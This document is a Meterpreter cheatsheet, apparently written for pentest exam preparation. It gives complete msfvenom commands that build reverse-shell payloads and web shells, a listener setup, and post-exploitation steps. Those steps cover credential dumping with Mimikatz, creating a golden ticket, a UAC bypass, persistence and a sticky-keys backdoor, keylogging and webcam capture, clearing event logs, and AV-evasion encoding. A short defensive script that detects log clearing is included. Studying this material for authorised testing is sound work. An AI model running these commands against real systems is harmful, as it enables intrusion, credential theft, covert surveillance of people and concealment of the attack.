Meterpreter

Cheatsheet

```bash
# --- Payload Generation (msfvenom) ---
# Windows reverse shell (staged)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f exe -o shell.exe
# Windows reverse shell (stageless)
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f exe -o shell.exe
# Linux reverse shell (staged)
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f elf -o shell.elf
# Linux reverse shell (stageless)
msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f elf -o shell.elf
# PHP web shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f raw -o shell.php
# ASP web shell
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f asp -o shell.asp
# WAR (Tomcat)
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f war -o shell.war
# DLL (for DLL hijacking / injection)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f dll -o shell.dll

# --- Listener Setup (msfconsole) ---
# Start multi/handler listener
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST <LHOST>; set LPORT <LPORT>; run"

# --- Post-Exploitation (inside Meterpreter session) ---
# System info
sysinfo
# Current user
getuid
# Elevate to SYSTEM
getsystem
# Dump SAM hashes (requires SYSTEM)
hashdump
# Dump hashes with Mimikatz
load kiwi
creds_all
# Migrate to a stable process (e.g., explorer.exe)
ps
migrate <PID>
# Search for files
search -f *.txt -d C:\\Users
# Download a file
download C:\\Users\\<USER>\\Desktop\\flag.txt
# Upload a file
upload /tmp/linpeas.sh /tmp/
# Drop to system shell
shell
# Background session (return to msf)
background
# Port forwarding (local)
portfwd add -l <LOCAL_PORT> -p <REMOTE_PORT> -r <TARGET_IP>
# Route traffic through session (pivoting)
run autoroute -s <SUBNET>/24
# Take screenshot
screenshot
# Start keylogger
keyscan_start
keyscan_dump
keyscan_stop
# Clear event logs (Windows)
clearev
```

Methodology

[!IMPORTANT] Follow this checklist after landing a Meterpreter session. The goal is to stabilize, escalate, loot, and pivot.

Phase 1: Stabilize the Session

  • sysinfo — Confirm OS, architecture, hostname, domain
  • getuid — Check current user context
  • ps — List processes, find a stable long-lived process (e.g., explorer.exe, svchost.exe)
  • migrate <PID> — Migrate into a stable process to avoid losing the session if the exploit process dies
  • getpid — Confirm migration succeeded

[!CAUTION] OPSEC Warning: Migrating to a process owned by a different user may fail or kill your session. Always migrate to a process owned by the same user.

Phase 2: Escalate Privileges

  • getsystem — Try automated SYSTEM escalation (uses named pipe impersonation / token duplication)
  • If getsystem fails, background the session and run: use post/multi/recon/local_exploit_suggester → set SESSION <ID> → run
  • Check for token impersonation: use incognito → list_tokens -u → impersonate_token "<DOMAIN>\\<USER>"
  • Check UAC status: run post/windows/gather/win_privs — if UAC is blocking, try exploit/windows/local/bypassuac_* modules
  • On Linux: shell → run manual [[Linux-Privilege-Escalation]] methodology

Phase 3: Credential Harvesting

  • hashdump — Dump SAM hashes (requires SYSTEM on Windows)
  • load kiwi → creds_all — Mimikatz integration, dumps all cached credentials
  • lsa_dump_sam (kiwi) — SAM database dump via LSA
  • lsa_dump_secrets (kiwi) — LSA secrets (may contain service account passwords)
  • run post/windows/gather/credentials/credential_collector — Aggregate all found creds
  • run post/multi/gather/ssh_creds — Grab SSH keys on Linux
  • search -f *.config -d C:\\inetpub — Search for web.config with connection strings
  • search -f *.txt -d C:\\Users — Search for password files, notes
  • cat C:\\Users\\<USER>\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt — PowerShell history

Phase 4: Loot the System

  • download C:\\Users\\<USER>\\Desktop\\* — Grab desktop files / flags
  • search -f proof.txt / search -f flag.txt — Find exam flags
  • run post/windows/gather/enum_applications — Installed software (may reveal vulns)
  • run post/windows/gather/enum_logged_on_users — Who else has logged in
  • run post/windows/gather/checkvm — Detect if target is a VM
  • arp — View ARP cache for network discovery
  • netstat — Active connections (reveals internal services/hosts)
  • ifconfig — Network interfaces (look for dual-homed hosts)
  • route — Routing table (reveals additional subnets)

Phase 5: Pivot to Internal Network

  • run autoroute -s <SUBNET>/24 — Add route through the compromised host
  • run autoroute -p — Verify routes
  • portfwd add -l <LOCAL_PORT> -p <REMOTE_PORT> -r <INTERNAL_IP> — Forward local port to internal target
  • Use auxiliary/scanner/portscan/tcp through the session to scan internal hosts
  • Background session and use exploit/multi/handler for chained sessions through the pivot

Phase 6: Persistence (if in scope)

  • run persistence -U -i 10 -p <LPORT> -r <LHOST> — User-level persistence (auto-starts on login)
  • run post/windows/manage/enable_rdp — Enable RDP for persistent GUI access
  • run post/windows/manage/sticky_keys — Sticky keys backdoor (RDP without creds)

[!CAUTION] OPSEC Warning: Persistence mechanisms leave artifacts. Only use if explicitly in scope. clearev alone does not remove all traces.

Phase 7: Clean Up

  • clearev — Clear Windows event logs (Security, System, Application)
  • Remove uploaded files
  • Kill any spawned processes
  • screenshot — Take final screenshots for the report before exiting
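As a defender's counterpart to the clearev item above, this added Python example (not part of the cheatsheet) flags the artifact that clearing a log leaves behind: Event ID 1102 in the Security log and Event ID 104 in the System log, which is why logs that were forwarded to a collector still show the clear. The JSON-lines export format and the sample records are constructed assumptions, not real telemetry.

```python
"""Detect Windows event-log clearing (the artifact left by Meterpreter's clearev)."""
import json

# Constructed sample in a hypothetical JSON-lines format as exported by a log forwarder.
SAMPLE_EVENTS = """
{"ts": "2024-05-01T10:00:01Z", "host": "WS01", "channel": "Security", "event_id": 4624, "user": "CORP\\\\alice"}
{"ts": "2024-05-01T10:05:12Z", "host": "WS01", "channel": "Security", "event_id": 1102, "user": "NT AUTHORITY\\\\SYSTEM"}
{"ts": "2024-05-01T10:05:12Z", "host": "WS01", "channel": "System",   "event_id": 104,  "user": "NT AUTHORITY\\\\SYSTEM"}
{"ts": "2024-05-01T10:05:13Z", "host": "WS01", "channel": "System",   "event_id": 104,  "user": "NT AUTHORITY\\\\SYSTEM"}
{"ts": "2024-05-01T10:07:00Z", "host": "WS02", "channel": "Security", "event_id": 4672, "user": "CORP\\\\bob"}
"""

# 1102 ("The audit log was cleared") is written to Security; 104 ("The <X> log file
# was cleared") is written to System. Both are the first record of the fresh log,
# so clearing cannot remove them, and a collector that already received the
# earlier records keeps them as well.
LOG_CLEARED_IDS = {("Security", 1102), ("System", 104)}


def parse_events(text):
    """Parse JSON-lines records, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def find_log_clears(events):
    """Return one alert per (host, user) that cleared a log, listing the channels touched."""
    alerts = {}
    for ev in events:
        if (ev["channel"], ev["event_id"]) not in LOG_CLEARED_IDS:
            continue
        key = (ev["host"], ev["user"])
        entry = alerts.setdefault(key, {"first_seen": ev["ts"], "channels": set()})
        entry["channels"].add(ev["channel"])
    return [
        {"host": h, "user": u, "first_seen": a["first_seen"], "channels": sorted(a["channels"])}
        for (h, u), a in alerts.items()
    ]


if __name__ == "__main__":
    for alert in find_log_clears(parse_events(SAMPLE_EVENTS)):
        print(f"[ALERT] {alert['host']}: event logs cleared by {alert['user']} "
              f"at {alert['first_seen']} ({', '.join(alert['channels'])})")
```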

Payload Generation Reference

Common msfvenom Formats

| Platform | Payload (Staged) | Format | Extension |
|---|---|---|---|
| Windows x64 | windows/x64/meterpreter/reverse_tcp | exe | .exe |
| Windows x86 | windows/meterpreter/reverse_tcp | exe | .exe |
| Linux x64 | linux/x64/meterpreter/reverse_tcp | elf | .elf |
| PHP | php/meterpreter/reverse_tcp | raw | .php |
| ASP | windows/meterpreter/reverse_tcp | asp | .asp |
| ASPX | windows/meterpreter/reverse_tcp | aspx | .aspx |
| JSP/WAR | java/jsp_shell_reverse_tcp | war | .war |
| Python | python/meterpreter/reverse_tcp | raw | .py |
| DLL | windows/x64/meterpreter/reverse_tcp | dll | .dll |

[!TIP] Staged vs Stageless: Staged payloads (/reverse_tcp) are smaller but need the handler to send stage 2. Stageless (_reverse_tcp) are larger but self-contained — use stageless if the network is unreliable or the handler might restart.

Encoding / AV Evasion

```bash
# Encode with x64/xor_dynamic, 5 iterations (basic encoding, often detected now;
# shikata_ga_nai is an x86-only encoder: x86/shikata_ga_nai)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -e x64/xor_dynamic -i 5 -f exe -o shell.exe
# List all encoders
msfvenom --list encoders
# List all formats
msfvenom --list formats
```

[!NOTE] Basic msfvenom encoding is widely detected by modern AV/EDR. For real engagements, consider custom loaders, shellcode injection, or tools like Sliver/Havoc as alternatives to Metasploit.


Core Commands

| Command | Purpose |
|---|---|
| background | Background session, return to msf> prompt |
| sessions | List all sessions / switch: sessions -i <ID> |
| exit | Kill the Meterpreter session |
| help | Show all available commands |
| info <module> | Show info about a post module |
| run <module> | Execute a post module or script |
| irb | Open interactive Ruby shell |
| load <extension> | Load extension (e.g., kiwi, incognito, powershell) |
| migrate <PID> | Move Meterpreter into another process |
| guid | Show session GUID |

File System Commands

| Command | Purpose |
|---|---|
| cd <dir> | Change directory |
| ls / dir | List files |
| pwd | Print working directory |
| cat <file> | Display file contents |
| edit <file> | Edit a file in-place |
| rm <file> | Delete a file |
| mkdir <dir> | Create a directory |
| rmdir <dir> | Remove a directory |
| upload <src> <dst> | Upload file to target |
| download <src> <dst> | Download file from target |
| search -f <pattern> | Search for files: search -f *.txt -d C:\\Users |
| checksum md5 <file> | MD5 hash a file |

Networking Commands

| Command | Purpose |
|---|---|
| arp | Display ARP cache (discover hosts on local subnet) |
| ifconfig / ipconfig | Show network interfaces |
| netstat | Show active connections |
| route | Display/modify routing table |
| portfwd add -l <LPORT> -p <RPORT> -r <IP> | Forward local port to remote service |
| portfwd delete -l <LPORT> | Remove port forward |
| portfwd list | List active port forwards |
| resolve <hostname> | DNS resolution on target |

System Commands

| Command | Purpose |
|---|---|
| sysinfo | OS, hostname, arch, domain, language |
| getuid | Current user |
| getpid | Current process ID |
| ps | List processes |
| kill <PID> | Kill a process |
| pkill <name> | Kill process by name |
| execute -f <cmd> | Run a command: execute -f cmd.exe -i -H |
| shell | Drop to native OS shell |
| reboot | Reboot target |
| shutdown | Shutdown target |
| clearev | Clear Windows event logs |
| getsystem | Attempt SYSTEM privilege escalation |

Surveillance Commands

| Command | Purpose |
|---|---|
| screenshot | Capture desktop screenshot |
| screenshare | Watch desktop in real time |
| keyscan_start | Start keylogger |
| keyscan_dump | Dump captured keystrokes |
| keyscan_stop | Stop keylogger |
| record_mic <seconds> | Record microphone audio |
| webcam_list | List webcams |
| webcam_snap | Take a webcam photo |
| webcam_stream | Stream webcam video |
| idletime | Seconds since user last interacted |

[!CAUTION] OPSEC Warning: Surveillance commands (keylogger, webcam, screenshare) are almost certainly out of scope on exams. Only use if the Rules of Engagement explicitly permit it.


Useful Post Modules

| Module | Purpose |
|---|---|
| post/multi/recon/local_exploit_suggester | Suggest local privilege escalation exploits |
| post/windows/gather/hashdump | Dump SAM hashes |
| post/windows/gather/credentials/credential_collector | Aggregate all found credentials |
| post/windows/gather/enum_applications | List installed applications |
| post/windows/gather/enum_logged_on_users | List logged on / recently logged on users |
| post/windows/gather/checkvm | Detect virtualization |
| post/windows/gather/win_privs | Show current privileges and UAC status |
| post/windows/manage/enable_rdp | Enable RDP on target |
| post/windows/manage/migrate | Migrate to another process |
| post/multi/manage/autoroute | Add pivot routes through session |
| post/multi/gather/ssh_creds | Collect SSH keys from target |
| post/linux/gather/hashdump | Dump /etc/shadow on Linux |
| post/linux/gather/enum_configs | Gather Linux config files |

[!TIP] Pentest Tip: Always run local_exploit_suggester after landing a session. It cross-references the target OS/patch level against known local exploits and saves significant manual enumeration time.


Kiwi (Mimikatz) Extension

```bash
# Load kiwi
load kiwi
# Dump all credentials
creds_all
# Dump SAM database
lsa_dump_sam
# Dump LSA secrets
lsa_dump_secrets
# Dump Kerberos tickets
kerberos_ticket_list
# Golden ticket
golden_ticket_create -d <DOMAIN> -u Administrator -s <DOMAIN_SID> -k <KRBTGT_HASH> -t /tmp/golden.kirbi
```

[!IMPORTANT] Kiwi commands require SYSTEM privileges. Run getsystem first or migrate to a SYSTEM-owned process.


#cpts #oscp #exploitation #post-exploitation #tools #windows #linux
